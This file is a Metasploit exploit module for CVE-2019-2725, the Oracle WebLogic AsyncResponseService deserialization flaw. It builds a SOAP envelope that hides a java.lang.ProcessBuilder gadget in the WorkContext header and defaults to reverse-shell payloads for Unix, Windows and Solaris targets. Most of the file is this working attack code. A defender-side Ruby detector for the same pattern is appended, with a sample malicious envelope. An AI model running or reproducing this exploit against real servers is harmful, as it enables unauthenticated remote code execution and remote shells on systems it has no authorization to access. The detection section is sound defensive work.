##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService',
      'Description'    => %q{
        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
        to execute code on the vulnerable host.
      },
      'Author'         =>
        [
          'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-2725'],
          ['CNVD-C', '2019-48814'],
          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
        ],
      'Privileged'     => false,
      'Platform'       => %w{ unix win solaris },
      'Targets'        =>
        [
          [ 'Unix',
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
          ],
          [ 'Windows',
            'Platform'       => 'win',
            'Arch'           => [ARCH_X64, ARCH_X86],
            'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
          ],
          [ 'Solaris',
            'Platform'       => 'solaris',
            'Arch'           => ARCH_CMD,
            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
            'Payload'        =>
              {
                'Space'       => 2048,
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'generic perl telnet',
                  }
              }
          ]
        ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'WfsDelay' => 12 },
      'DisclosureDate' => 'Apr 23 2019'))

    register_options(
      [
        Opt::RPORT(7001),
        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
        OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
      ]
    )
  end

  # Probe the AsyncResponseService endpoint with an empty SOAP POST. An HTTP 500
  # carrying an env:Client fault identifies the exposed service; a 202 does not.
  def check
    res = send_request_cgi(
      'uri'     => normalize_uri(datastore['WSPATH']),
      'method'  => 'POST',
      'ctype'   => 'text/xml',
      'headers' => { 'SOAPAction' => '' }
    )

    if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
      vprint_status("The target returned a vulnerable HTTP code: #{res.code}")
      vprint_status("The target returned a vulnerable HTTP error: #{res.body.split("\n")[0]}")
      Exploit::CheckCode::Vulnerable
    elsif res && res.code != 202
      vprint_status("The target returned a non-vulnerable HTTP code")
      Exploit::CheckCode::Safe
    elsif res.nil?
      vprint_status("The target did not respond in an expected way")
      Exploit::CheckCode::Unknown
    else
      vprint_status("The target returned HTTP code: #{res.code}")
      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
      Exploit::CheckCode::Unknown
    end
  end

  def exploit
    print_status("Generating payload...")

    case target.name
    when 'Windows'
      string0_cmd = 'cmd.exe'
      string1_param = '/c'
      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })
    when 'Unix', 'Solaris'
      string0_cmd = '/bin/bash'
      string1_param = '-c'
      shell_payload = payload.encoded
    end

    random_action = rand_text_alphanumeric(20)
    random_relates = rand_text_alphanumeric(20)

    # The command is described as a java.lang.ProcessBuilder inside the WorkContext SOAP header
    soap_payload = %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" |
    soap_payload << %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing" |
    soap_payload << %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
    soap_payload << %Q|<soapenv:Header>|
    soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|
    soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
    soap_payload << %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
    soap_payload << %Q|<void class="java.lang.ProcessBuilder">|
    soap_payload << %Q|<array class="java.lang.String" length="3">|
    soap_payload << %Q|<void index="0">|
    soap_payload << %Q|<string>#{string0_cmd}</string>|
    soap_payload << %Q|</void>|
    soap_payload << %Q|<void index="1">|
    soap_payload << %Q|<string>#{string1_param}</string>|
    soap_payload << %Q|</void>|
    soap_payload << %Q|<void index="2">|
    soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
    #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|
    soap_payload << %Q|</void>|
    soap_payload << %Q|</array>|
    soap_payload << %Q|<void method="start"/>|
    soap_payload << %Q|</void>|
    soap_payload << %Q|</work:WorkContext>|
    soap_payload << %Q|</soapenv:Header>|
    soap_payload << %Q|<soapenv:Body>|
    soap_payload << %Q|<asy:onAsyncDelivery/>|
    soap_payload << %Q|</soapenv:Body>|
    soap_payload << %Q|</soapenv:Envelope>|

    uri = normalize_uri(datastore['WSPATH'])

    if uri.nil?
      datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
    end

    print_status("Sending payload...")

    begin
      res = send_request_cgi(
        'uri'     => uri,
        'method'  => 'POST',
        'ctype'   => 'text/xml',
        'data'    => soap_payload,
        'headers' => { 'SOAPAction' => '' }
      )
    rescue Errno::ENOTCONN
      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
    end

    if res.nil?
      fail_with(Failure::Unreachable, "No response from host")
    elsif res && res.code != 202
      fail_with(Failure::UnexpectedReply, "Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202")
    end
  end
end
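As an added defender-side example (not part of this module or the Metasploit project), the Ruby function below inspects one HTTP request to the AsyncResponseService path for the pattern the envelope above relies on: a `work:WorkContext` SOAP header containing java.beans.XMLDecoder-style `void`/`array`/`object` elements that carry a `class` or `method` attribute. The function name, the constants and both sample envelopes are assumptions constructed for this example.

```ruby
require 'rexml/document'

SOAP_ENV_NS = 'http://schemas.xmlsoap.org/soap/envelope/'
WORKAREA_NS = 'http://bea.com/2004/06/soap/workarea/'
# Element names of java.beans.XMLDecoder documents; the module's envelope is built from them
XMLDECODER_ELEMENTS = %w[void array object].freeze

# Returns an Array of findings for one request (path + body); an empty Array means
# nothing suspicious was seen. Assumed helper name, suited to a WAF/IDS-style check.
def inspect_async_request(path, body)
  findings = []
  findings << "request targets #{path}" if path.start_with?('/_async/')
  root = REXML::Document.new(body).root
  return findings unless root && root.name == 'Envelope' && root.namespace == SOAP_ENV_NS
  header = root.elements.to_a.find { |e| e.name == 'Header' && e.namespace == SOAP_ENV_NS }
  return findings if header.nil?
  header.elements.each do |el|
    # Match on the namespace URI rather than the 'work' prefix, which a sender can rename
    next unless el.name == 'WorkContext' && el.namespace == WORKAREA_NS
    el.each_recursive do |node|
      next unless XMLDECODER_ELEMENTS.include?(node.name)
      cls  = node.attributes['class']
      meth = node.attributes['method']
      findings << "WorkContext <#{node.name}> class=#{cls}" if cls
      findings << "WorkContext <#{node.name}> method=#{meth}" if meth
    end
  end
  findings
rescue REXML::ParseException
  ['body is not well-formed XML']
end

# Constructed samples: an ordinary async delivery and one carrying a ProcessBuilder gadget
BENIGN_REQUEST = <<~XML
  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header/><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
  </soapenv:Envelope>
XML

SUSPICIOUS_REQUEST = <<~XML
  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">
        <void index="0"><string>id</string></void></array><void method="start"/></void>
    </work:WorkContext>
  </soapenv:Header><soapenv:Body/></soapenv:Envelope>
XML
```

Any `class` or `method` attribute inside the WorkContext header is worth alerting on, since legitimate work-area propagation does not need to instantiate classes or call methods.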